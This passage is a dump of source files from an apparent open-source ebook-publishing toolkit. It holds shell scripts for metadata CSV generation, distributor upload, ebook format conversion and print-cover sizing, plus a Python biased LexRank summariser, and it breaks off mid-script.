$metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# is_active\n\necho -n \"1,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# meta_title\n\necho -n \"Public Bookshelf for $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# url_path\n\necho -n $\"$safe_url_key.html,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n\n# is_anchor\n\necho -n \"1,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# meta_keywords\n\necho -n \"TBD,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# meta_description\n\necho -n \"Publicly shared ebooks from PageKicker customer $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# display_mode\n\necho -n \"PRODUCTS_AND_PAGE,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# page_layout\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# cms_block\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_layout_update\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_design\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# category_image\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# category_thumb_image\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# include_in_menu\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_apply_to_products\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_use_parent_settings\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n# position\n\n# last column has no -n flag and no terminal comma\n\necho 
\"1\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7520798444747925, "alphanum_fraction": 0.7554076313972473, "avg_line_length": 39.06666564941406, "blob_id": "ef8157f5ff97f450aed5aacc8a4701d832e3d26a", "content_id": "ff1ae1be0cefe732ee51294f3be372fd8f59f6a8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 601, "license_type": "permissive", "max_line_length": 153, "num_lines": 15, "path": "/scripts/includes/LSI-upload.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nINGRAMSFTPSERVER=\"cs2ftp.ingramcontent.com\"\n# insert header in accumulated metadata import rows\n\n# SERVER=\necho \"building LSI import metadata\" | tee --append $sfb_log\n\ncat includes/lsi-metadata-header.txt > $SFB_MAGENTO_HOME\"wfrederickzimmerman_\"$YYYYMMDD\".csv\"\ncat $metadatatargetpath\"/lsi-import-ready.csv\" >> $SFB_MAGENTO_HOME\"wfrederickzimmerman_\"$YYYYMMDD\".csv\"\n\n# convert csv to xls with (grr...) sheet named \"metadata\"\n\n(echo put $$SFB_MAGENTO_HOME\"wfrederickzimmerman_\"$YYYYMMDD\".xls\" echo put $SFB_MAGENTO_HOME\"lsi-import\"/*.EPUB; echo quit) | sftp -b - $INGRAMSFTPSERVER\n\nexit 0\n" }, { "alpha_fraction": 0.5378549098968506, "alphanum_fraction": 0.551261842250824, "avg_line_length": 18.8125, "blob_id": "fa1ea3c0b2def117f49485d456a268cc04bc0e67", "content_id": "e452d5a5d0e0b1a9b3687d4585965186de1bf538", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1268, "license_type": "permissive", "max_line_length": 122, "num_lines": 64, "path": "/scripts/acronym-filter.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# filters text file looking for acronyms\n\n# input: text file as --txtinfile\n# output: sorted uniq stdout\n# flags: --verbose \"y\" (stupidly requires y)\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--verbose|v)\nverbose=$2\nshift 2\n;;\n--verbose|v=*)\nverbose=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. 
See --help\" >&2\n exit 1\nfi\n\nif [ \"$verbose\" = \"y\" ] ; then\n\techo \"text infile is \"$txtinfile\nelse\n\ttrue\nfi\n\n\n#sed 's/[[:space:]]\\+/\\n/g' $txtinfile | sort -u | egrep '[[:upper:]].*[[:upper:]]' | sed 's/[\\(\\),]//g' | uniq\nsed 's/[[:space:]]\\+/\\n/g' \"$txtinfile\" | sort -u | egrep -e '[A-Z][a-zA-Z0-9+\\.\\&]*[A-Z0-9]' | sed 's/[\\(\\),]//g' | uniq\n# more selective regex\n" }, { "alpha_fraction": 0.7214621305465698, "alphanum_fraction": 0.727384090423584, "avg_line_length": 31.00653648376465, "blob_id": "021e70a45ece3fd8e5343207b8c5903dbceb8064", "content_id": "9af1c495aa8d2019788a08f60b67fd17d8b464e7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4897, "license_type": "permissive", "max_line_length": 503, "num_lines": 153, "path": "/scripts/includes/ebook-convert.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "if [ \"$build_all_formats\" = \"yes\" ] ; then\n\n\techo \"building all available ebook formats\"\n\tbuild_bw_pdf=\"yes\"\n\tbuild_color_pdf=\"yes\"\n\tbuild_mobi=\"yes\"\n\tbuild_linkrich_epub=\"yes\"\n\tbuild_text_epub=\"yes\"\n\tbuild_txt_html_only=\"yes\"\n\tbuild_docx=\"yes\"\n\nelse\n\n\techo \"building only specified formats\"\n\nfi\n\n# converting cumulative txt file to outputs dependent on it\n\necho \"converting txt to strictly compliant epub\" \n\nxvfb-run --auto-servernum ebook-convert tmp/$uuid/\"cumulative.txt\" $mediatargetpath$uuid/$sku\"plaintxt.epub\" --smarten-punctuation --language $\"English\" --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --enable-heuristics --chapter-mark \"pagebreak\" --formatting-type \"heuristic\" --dont-split-on-page-breaks --pretty-print --remove-first-image --formatting-type \"heuristic\" 1> /dev/null\n\n\n# checking that epub is compliant\n\necho \"running epubcheck\"\n\n$JAVA_BIN -jar $epubcheckjarpath $mediatargetpath$uuid/$sku\"plaintxt.epub\" \n\nepubchecksuccess=$?\n\necho \"epubchecksuccess on book \"$sku\"plaintxt.epub is\" $epubchecksuccess \n\n# converting cumulative html files\n\nif [ \"$build_linkrich_epub\" = \"yes\" ] ; then\n\n\techo \"converting cumulative html to linkrich epub using calibre\" \n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\"linkrich.epub\" --smarten-punctuation --language $LANG --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --enable-heuristics --chapter-mark \"pagebreak\" --dont-split-on-page-breaks --pretty-print --remove-first-image 1> /dev/null\n\n\tcp $mediatargetpath$uuid/$sku\"linkrich.epub\" $mediatargetpath$uuid/$safecovertitle\".epub\"\n\n\techo \"converting temptoc.html to linkrich epub using calibre\"\n\t\n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/temptoc.html $mediatargetpath$uuid/$sku\"multipart.epub\" --smarten-punctuation --language $LANG --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --enable-heuristics --chapter-mark \"pagebreak\" --dont-split-on-page-breaks --pretty-print --remove-first-image --max-levels \"1\" 1> /dev/null\nelse\n\n\techo \"not building linkrich epub\"\n\nfi\n\nif [ \"$build_mobi\" = \"yes\" ] ; then\n\n\techo \"converting html to mobi using calibre\" \n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\".mobi\" 
--smarten-punctuation --insert-metadata --language $\"English\" --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath/$uuid/cover.png --authors \"$editedby\" --enable-heuristics 1> /dev/null\n\nelse\n\n\techo \"not building mobi\"\n\nfi\n\n\nif [ \"$build_docx\" = \"yes\" ] ; then\n\n\techo \"converting html to docx using pandoc\"\n\n\tpandoc -s -S --toc tmp/$uuid/\"cumulative.html\" -o $mediatargetpath$uuid/$sku\".docx\"\n\nelse\n\n\techo \"not building docx\"\n\nfi\n\n\nif [ \"$build_color_pdf\" = \"yes\" ] ; then\n\n\n\techo \"converting cumulative html to pdf using calibre and default ebook cover\" \n\n\tif [ \"$booktype\" = \"Reader\" ] ; then\n\n\t\tsize=\"5x8\"\n\n\telse\n\n\t\tsize=\"8.5x11\"\n\tfi\t\n\techo \"size is\" $size\n\n\techo \"deciding on pdfserif font\"\n\tpdfserif=$(shuf ../conf/pdfserif_fonts.txt)\n\techo \"pdfserif is\" $pdfserif\n\n\txvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\"print_color.pdf\" --cover \"images/\"$uuid/ebookcover/$sku\"cover.png\" --pdf-serif-family \"$pdfserif\" --margin-left \"54\" \\--margin-right \"54\" --margin-top \"54\" --margin-bottom \"54\" --pdf-default-font-size \"14\" --pretty-print --language $LANG --publisher \"PageKicker\" --title \"$covertitle\" --cover $mediatargetpath$uuid/cover.png --authors \"$editedby\" --chapter-mark \"pagebreak\" --custom-size \"$size\" 1> /dev/null\n\n\n#echo removing page 1\n\n#pdftk $mediatargetpath$uuid/$sku\"print_tmp.pdf\" cat 2-end output $mediatargetpath$uuid$sku\"print.pdf\"\n\n#echo \"saving interior as PDFx1a\"\n\n\tif [ \"$build_bw_pdf\" = \"yes\" ] ; then\n\n\n\t# -B flag makes it b&w\n\n\t./lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -B -o $mediatargetpath$uuid/$sku\"bw.pdf\" $mediatargetpath$uuid/$sku\"print_color.pdf\"\n\n\t# cp $mediatargetpath$uuid/$sku\"print_nocover.pdf\" $mediatargetpath/$sku\"print.pdf\"\n\n\telse\n\n\t\techo \"not building b&w pdf\"\n\n\tfi\n\nelse\n\n\techo \"not building color or bw pdfs\"\n\nfi\n\n\nif [ $userdescription = \"yes\" ] ; then\n\n\techo \"appending user description to book metadata\"\n\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/shortdescription.html\n\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/lsi-shortdescription.txt\n\nelse\n\n\techo \"no user description was provided\"\n\nfi\n\n\nif [ \"$mylibrary\" = \"yes\" ] ; then\n\t\n\tcp $mediatargetpath/$uuid/$sku\"plaintxt.epub\" $mediatargetpath\"../calibre-import/\"\n\techo \"copied \"$sku\"plaintxt.epub to my calibre library\" \n\nelse\n\n\techo \"calibre import flag was off\" \n\nfi\n" }, { "alpha_fraction": 0.680081844329834, "alphanum_fraction": 0.6834924817085266, "avg_line_length": 37.47368240356445, "blob_id": "1150fc329a0a51f97d359ee7fa1f8ef644eb1951", "content_id": "eec1dc4ecc6968043d324cb1b02ec3fededdd33d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1466, "license_type": "permissive", "max_line_length": 213, "num_lines": 38, "path": "/scripts/includes/process-nodes-from-searchresults-4-booktype-reader.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# process XML search results file when booktype is Reader -- ie relevancy search\n\n\nxmlstarlet sel -N x=\"http://opensearch.org/searchsuggest2\" -t -m \"//x:Item\" -v \"x:Url\" -n fetch/$uuid/searchresults.xml | sed '/^$/d' > 
fetch/$uuid/urls.txt\n\nxmlstarlet sel -N x=\"http://opensearch.org/searchsuggest2\" -t -m \"//x:Item\" -v \"x:Text\" -n fetch/$uuid/searchresults.xml | sed '/^$/d' | grep -Ev 'Wikipedia|Template|Category|Portal|Help' > fetch/$uuid/titles.txt\n\n xmlstarlet sel -N x=\"http://opensearch.org/searchsuggest2\" -t -m \"//x:Item\" -v \"x:Description\" -n fetch/$uuid/searchresults.xml | sed '/^$/d' > fetch/$uuid/descriptions.txt\n\ncat fetch/$uuid/titles.txt | grep -Ev 'Wikipedia|Template|Category|Portal|Help'\n\ncat fetch/$uuid/urls.txt | sed -e 's/;/_/g' > fetch/$uuid/safeurls.txt\ncat fetch/$uuid/titles.txt | sed -e 's/;/_/g' > fetch/$uuid/safetitles.txt\ncat fetch/$uuid/descriptions.txt | sed -e 's/;/_/g' > fetch/$uuid/safedescriptions.txt\n\npaste fetch/$uuid/urls.txt fetch/$uuid/titles.txt fetch/$uuid/descriptions.txt > fetch/$uuid/safesearchresults.txt\n\n# add this after \"x:Text\" to reinsert Description-o \", \" -v \"x:Description\" -o \", \" -v \"x:Text\"\n\ncount=1\n\ndoccount=`wc -l < fetch/$uuid/safeurls.txt`\n\nif [ \"$doccount\" = 0 ] ; then\n\n\techo \"no relevant documents for seed\" $seed | tee --append $sfb_log\n\n\tseedhasdocs=\"no\"\n\n\t\n\nelse\n\n\techo \"will be fetching \" $doccount \"documents on this seed \" $seed | tee --append $sfb_log\n\n\tseedhasdocs=\"yes\"\n\nfi\n\n\n\n\n" }, { "alpha_fraction": 0.6216475367546082, "alphanum_fraction": 0.6216475367546082, "avg_line_length": 36.28571319580078, "blob_id": "f3e57e5513ff7ca2938f00ba253879326c64b527", "content_id": "2b2a87b3e8e5c76d755e12b8fc8eece201d592b3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1044, "license_type": "permissive", "max_line_length": 98, "num_lines": 28, "path": "/scripts/includes/abstracts.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "case $summary in\nsummaries_only)\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \"# Abstracts\" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n cat \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" | sed -e 's/#/##/' >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n ;;\ncomplete_pages_only)\n echo \"using complete pages only for main body\"\n ;;\nboth)\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \"# Abstracts\" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n cat \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" | sed -e 's/#/##/' >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n echo \" \" >> \"$TMPDIR\"$uuid/humansummary.md\n;;\n*)\n echo \"unrecognized summary option\"\n;;\nesac\n" }, { "alpha_fraction": 0.6913043260574341, "alphanum_fraction": 0.695652186870575, "avg_line_length": 12.352941513061523, "blob_id": "b8318c84674b22b12467166d9e6eeed4177aff04", "content_id": "8924cbd07461c8fe2ca23189125757d5d47cbef3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 230, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/scripts/bin/publicity-bot.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# run 
the publicity bot as a cron job every six hours or so\n\n# read the csv watch file line by line; the two-column layout (tweet text, facebook status) is an assumption\nwhile IFS=, read -r t_message fb_message\ndo\n\nt update \"$t_message\" \n\nfbcmd status \"$fb_message\"\n\n# mailchimp?\n\n\ndone<../conf/publicity_bots/watch_files/watch_titles.csv\nexit 0\n\n\n\n" }, { "alpha_fraction": 0.6655518412590027, "alphanum_fraction": 0.6825529336929321, "avg_line_length": 29.151260375976562, "blob_id": "daaa0340e90f4f445c88f40cf50e42c21be3027b", "content_id": "1a61836c4fe5139d34a8a2deb9930d8cad691521", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3588, "license_type": "permissive", "max_line_length": 129, "num_lines": 119, "path": "/scripts/includes/biased_lexrank.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#Filename: biased_lexrank.py\n\n\ndef b_lexrank(G, baseline_score, alpha = 0.85, personalization=None, max_iter=100, tol=1.0e-6, weight='weight', seed_weight = 1):\n\t\"\"\" Return the biased Lexrank scores of the nodes in the graph\n\n\t\tThis program is based upon the pagerank_scipy program from the networkx \n\t\tsource.\n\n\tParameters\n\t___________\n\tG: graph\n\t\tA NetworkX graph\n\n\talpha: float, optional\n\t\tA damping parameter for PageRank, default = 0.85\n\n\tpersonalization: dict, optional\n\t\tThe \"personalization vector\" consisting of a dictionary with a\n\t\tkey for every graph node and nonzero personalization value for each node.\n\n\tmax_iter : integer, optional\n\t\tMaximum number of iterations in power method eigenvalue solver.\n\n\ttol : float, optional\n\t\tError tolerance used to check convergence in power method solver.\n\n\tweight : key, optional\n\t\tEdge data key to use as weight. If None weights are set to 1.\n\t\n\tbaseline_score: vector, float\n\t\tsimilarity scores between the seed and sentences within the graph\n\n\n\n\tReturns\n\t-------\n\tpagerank : dictionary\n\t\tDictionary of nodes with PageRank as value\n\n\tExamples\n\t--------\n\t\t>>> G=nx.DiGraph(nx.path_graph(4))\n\t\t>>> pr=nx.pagerank_scipy(G,alpha=0.9)\n\n\tNotes\n\t-----\n\tThe eigenvector calculation uses power iteration with a SciPy\n\tsparse matrix representation.\n\n\n\t\tReferences\n\t\t----------\n\t\t.. [1] A. Langville and C. Meyer,\n\t\t "A survey of eigenvector methods of web information retrieval."\n\t\t http://citeseer.ist.psu.edu/713792.html\n\t\t.. [2] Page, Lawrence; Brin, Sergey; Motwani, Rajeev and Winograd, Terry,\n\t\t The PageRank citation ranking: Bringing order to the Web. 
1999\n\t\t http://dbpubs.stanford.edu:8090/pub/showDoc.Fulltext?lang=en&doc=1999-66&format=pdf\n\t\t [3] Otterbacher, Erkan and Radev, Biased LexRank: Passage Retrieval using Random\n\t\t Walks with Question-Based Priors (2008)\n\t\t\"\"\"\n\n\ttry:\n\t\timport scipy.sparse\n\t\timport networkx as nx\n\t\tfrom numpy import diag\n\t\tfrom networkx.exception import NetworkXError\n\texcept ImportError:\n\t\traise ImportError(\"pagerank_scipy() requires SciPy: http://scipy.org/\")\n\tif len(G) == 0:\n\t\treturn {}\n # choose ordering in matrix\n\tif personalization is None: # use G.nodes() ordering\n\t\tnodelist=G.nodes()\n\telif personalization is 'biased':\n\t\tnodelist = G.nodes()\n\telse: # use personalization \"vector\" ordering\n\t\tnodelist=list(personalization.keys())\n\tM=nx.to_scipy_sparse_matrix(G,nodelist=nodelist,weight=weight,dtype='f')\n\t(n,m)=M.shape # should be square\n\tS=scipy.array(M.sum(axis=1)).flatten()\n# for i, j, v in zip( *scipy.sparse.find(M) ):\n# M[i,j] = v / S[i]\n\tS[S>0] = 1.0 / S[S>0]\n\t#creates a sparse diagonal matrix with normalization values\n\tQ = scipy.sparse.spdiags(S.T, 0, *M.shape, format='csr')\n\tM = Q * M\n\tx=scipy.ones((n))/n # initial guess\n\tdangle=scipy.array(scipy.where(M.sum(axis=1)==0,1.0/n,0)).flatten()\n\t # add \"teleportation\"/personalization\n\tif personalization is 'biased':\n\t\tv = scipy.array(baseline_score)\n\t\tv = v/v.sum()\n\t\tv = seed_weight * v/v.sum()\n\t\t#print v.shape\n\t\t\n\t\t\n\telif personalization is not None:\n\t v=scipy.array(list(personalization.values()),dtype=float)\n\t v=v/v.sum()\n\telse:\n\t v=x\n\t #print v.shape\n\t \n\ti=0\n\twhile i <= max_iter:\n\t # power iteration: make up to max_iter iterations\n\t xlast=x\n\t x=alpha*(x*M+scipy.dot(dangle,xlast))+(1-alpha)*v\n\t x=x/x.sum()\n\t # check convergence, l1 norm\n\t err=scipy.absolute(x-xlast).sum()\n\t if err < n*tol:\n\t return dict(list(zip(nodelist,list(map(float,x)))))\n\t i+=1\n\traise NetworkXError('pagerank_scipy: power iteration failed to converge'\n\t 'in %d iterations.'%(i+1))\n" }, { "alpha_fraction": 0.7209818363189697, "alphanum_fraction": 0.738466739654541, "avg_line_length": 30.70575714111328, "blob_id": "537bc0c0811651f863647339dea33faa936ba7b6", "content_id": "6f042503d9050689f79f7947de6ee2859d4581bf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 14870, "license_type": "permissive", "max_line_length": 221, "num_lines": 469, "path": "/scripts/includes/print-cover-builder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# run from $SFB_HOME\"scripts\"\n\n. ./flags.sh\n\n. ../conf/config.txt\n\n# . bin/float_fx.sh\n\necho \"printconfigfile is \"$printconfigfile\n\nif [ $printconfigfile = \"yes\" ] ; then\n\n\t . 
../conf/printconfig.txt\n\n\techo \"using print configuration from file\" | tee --append $sfb_log\n\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"new uuid for this instance is\" $uuid | tee --append $sfb_log\n\n\n\tmkdir images/$uuid\n\techo \"created directory images/\"$uuid\n\nelse\n\n\techo \"using print configuration passed along from parent process\" | tee --append $sfb_log\n\techo \"uuid passed along from parent is\" $uuid | tee --append $sfb_log\n\nfi\n\n\n\n# print cover builder\n\necho \"starting print cover builder\" | tee --append $sfb_log\n\n# cleanup previous images\n\n# rm -rf images/\n# echo \"removed previous images\" | tee --append $sfb_log\n\n\ncd images/$uuid ; mkdir print ; echo \"created directory images/$uuid/print\" ; cd $scriptpath ; echo \"changed directory back to \" $scriptpath | tee --append $sfb_log\n\n# print cover builder is inserted into cases in cover-build.sh depending on values received from xform\n\n# now echoing values of variables that will be needed to build the print cover\n\n\necho \"booktype was \" $booktype | tee --append $xform_log\necho \"simpleseed was \" $simpleseed | tee --append $xform_log\necho \"coverfont was\" $coverfont | tee --append $xform_log\necho \"covercolor was\" $coverfont | tee --append $xform_log\necho \"covercolorfont was\" $covercolorfont | tee --append $xform_log\necho \"coverRGB was\" $coverRGB | tee --append $xform_log\necho \"userdescription was \" $userdescription > $scriptpath\"bin/xform-includes/userdescription.txt\" | tee --append $xform_log\necho \"imagebase was \" $imagefilename| tee --append $xform_log\necho \"printcreate was \" $printcreate| tee --append $xform_log\necho \"pagecount was \" $pagecount | tee --append $xform_log\necho \"trimsize was\" \"$trimsize\" | tee --append $xform_log\necho \"spinewidth was\" \"$spinewidth\" | tee --append $xform_log\necho \"printbookprice was\" $printbookprice | tee --append $xform_log\necho \"aliastobackendcopy was\" $aliastobackendcopy | tee --append $xform_log\necho \"copyinbackend was\" $copyinbackend | tee --append $xform_log\necho \"userprovidedprintISBN was \"$userprovidedprintISBN | tee --append $xform_log\n\n# convert spine width to pixels\nasterisk=\"*\"\ndpi=\"300\"\n\nspinepixelsfloat=`python -c \"from math import ceil ;print ceil($spinewidth*300)\"`\necho \"spinepixelsfloat is \" $spinepixelsfloat\nfor rounded in $(printf %.0f $spinepixelsfloat); do spinepixels=$rounded ; done\n# convert trim size to pixel height and width of full canvas\n\ncase $trimsize in\n\n\t5x8pb)\n\t\tpagewidth=1500\n\t\tpageheight=2400 \n\n\t;;\n\n\t55x85pb)\n\t\tpagewidth=1650\n\t\tpageheight=2550\n\n\t;;\n\t6x9pb)\n\t\tpagewidth=1800\n\t\tpageheight=2700\n\t;;\n\t6x9laminate)\n\t\tpagewidth=1800\n\t\tpageheight=2700\n\t;;\n\t6x9case)\n\t\tpagewidth=1800\n\t\tpageheight=2700\n\t;;\n\t8x10pb)\n\t\tpagewidth=2400\n\t\tpageheight=3000\n\t;;\n\t8x10laminate)\n\t\tpagewidth=2400\n\t\tpageheight=3000\n\t;;\n\t8.5x11pb)\n\t\tpagewidth=2550\n\t\tpageheight=3300\n\t;;\n\t8.5x11laminate)\n\t\tpagewidth=2550\n\t\tpageheight=3300\n\t;;\n\n\t*)\n\tcanvaswidth=\"n/a\"\n\theight=\"n/a\"\n\t\techo \"no trim size was available, exiting\" | tee --append $sfb_log\n\texit\n\t;;\n\nesac\n\necho \"assigned pagewidth as \" $pagewidth \"and height as\" $height \"pixels\" \n\n# canvas calculations\n\tbleed=38\n\n\tcanvaswidth=$(( $pagewidth * 2 + $spinepixels + $bleed + $bleed ))\n\tcanvasheight=$(( $bleed + $pageheight + $bleed ))\n\n\techo \"calculated canvaswidth as \"$canvaswidth\n\techo 
\"calculated canvasheight as \"$canvasheight\n\n\t#calculate text safety areas\n\n\ttextsafety=150\n\n\tsafepagewidth=$(( $pagewidth - $textsafety - $textsafety ))\n\tsafepageheight=$(( $pageheight - $textsafety ))\n\n\techo \"calculated safepagewidth as\" $safepagewidth\n\techo \"calculated safepageheight as\" $safepageheight\n\n# spine calculations\n\n\tif [ $spinepixels -lt 105 ] ; then\n\t\tspinesafety=12\n\telse\n\t\tspinesafety=22\n\tfi\n\n\techo \"because spine width is less than 105 pixels, spinesafety is \" $spinesafety\n\n\tsafespinetitlewidth=$(( $spinepixels - $spinesafety - $spinesafety ))\n\n\techo \"safespinetitlewidth is\" $safespinetitlewidth\n\n\tsafespinetitleheight=$(( $safepageheight / 2 ))\n\n\techo \"calculated safespinetitleheight as \" $safespinetitleheight\n\n\tspineleftmargin=$(( $bleed + $pagewidth + $spinesafety ))\n\n\techo \"calculated spineleftmargin as bleed + page width +spinepixels for \" $spineleftmargin\n\n# front page calculations\n\n\tfrontpageflushleftmargin=$(( $bleed + $pagewidth + $spinepixels + $textsafety ))\n\n\techo \"calculated frontpageflushleftmargin as\" $frontpageflushleftmargin\\\n\n\t# there's always a cushion around top and bottom text t\n\n\tfrontpagetopcushion=150\n\n\tfrontpagebottomcushion=0\n\n\techo \"frontpagetopcushion is \" $frontpagetopcushion\n\techo \"frontpagebottomcushion is \" $frontpagebottomcushion\n\n\n# back page calculations\n\n\tISBNylocation=$(( $safepageheight - 372 - 25 ))\n\tISBNxlocation=$(( 150 + 25 ))\n\n\n# build objects that are always the same\n\n\t# build the bottom canvas\n\n\tx=\"x\"\n\n\tconvert -size $canvaswidth$x$canvasheight xc:$newcovercolor \\\n\t-units \"PixelsPerInch\" -density 300 -resample 300x \\\n\timages/$uuid/print/bottomcanvas.png\n\n#\t# build the front page canvas\n\n#\tconvert -size $pagewidth$x$height xc:$newcovercolor images/$uuid/print/frontpagecanvas.png\n\n#\t# build the back page canvas\n\n#\tconvert -size $pagewidth$x$height xc:$newcovercolor images/$uuid/print/backpagecanvas.png\n\n\t# build the ISBN\n\n\tpython $scriptpath/lib/bookland-1.4/bookland -o images/$uuid/print/$sku.eps -f OCRB -b 1 -q --rgb 0,0,0 --cmyk 0,0,0,1.0 \"$userprovidedprintISBN\" 90000\n\n\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 25x25 -bordercolor white images/$uuid/print/$sku.eps -colorspace CMYK images/$uuid/print/ISBN$sku.png\n\n# now decide which cover to use\n\ncase $coverlayout in\n\n\n2) \n\n# build objects that are always the same except sometimes they are translucent\n\n\techo \"using cover layout id=2, front window, simple image in center of front cover, text on back\"\n\n\n\t\t# build the spine caption\n\n\t\tconvert -size $safespinetitleheight$x$safespinetitlewidth -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity West caption:\"$escapeseed\" images/$uuid/print/spinecaption.png\n\n\t\t# build the spine Nimble Books LLC caption\n\n\t\tconvert -size $safespinetitleheight$x$safespinetitlewidth -background $newcovercolor -fill \"$coverfontcolor\" -font $coverfont -rotate 90 -gravity West caption:\"Nimble Books LLC\" images/$uuid/print/spinenimblecaption.png\n\n\t# use the golden ratio to define the vertical size of the page elements: title/subtitle block = 0.31 (1/2 golden ratio), image = 0.382 , byline/logotype = 0.31\n\n\t\t# top section = safepageheight * .31\n\n\t\ttopsectionpixelsfloat=`python -c \"from math import ceil ;print ceil($safepageheight*0.31)\"`\n\t\tfor rounded in $(printf %.0f $topsectionpixelsfloat); do 
